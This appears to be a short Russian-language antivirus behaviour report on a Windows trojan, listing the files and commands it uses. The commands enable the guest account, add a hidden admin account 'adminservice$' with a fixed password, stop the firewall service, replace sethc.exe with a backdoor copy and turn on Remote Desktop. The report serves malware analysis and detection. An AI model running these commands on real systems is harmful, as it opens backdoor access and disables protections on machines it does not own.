Техническая информация
- <SYSTEM32>\sethc.exe
- Заменяет файл <SYSTEM32>\dllcache\sethc.exe файлом <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\dllcache\sethc.exe.new
- <SYSTEM32>\sethc.exe
- '<SYSTEM32>\net1.exe' user guest /active:yes
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' user guest 110120
- '%WINDIR%\regedit.exe' /s 3389.reg
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s guest /add
- '<SYSTEM32>\net1.exe' user adminservice$ 110120 /add
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\3389.bat""
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s adminservice$ /add
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start TermService
- <Текущая директория>\3389.reg
- %TEMP%\1.tmp\3389.bat
- %TEMP%\1.tmp\3389.bat
- <Текущая директория>\3389.reg
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'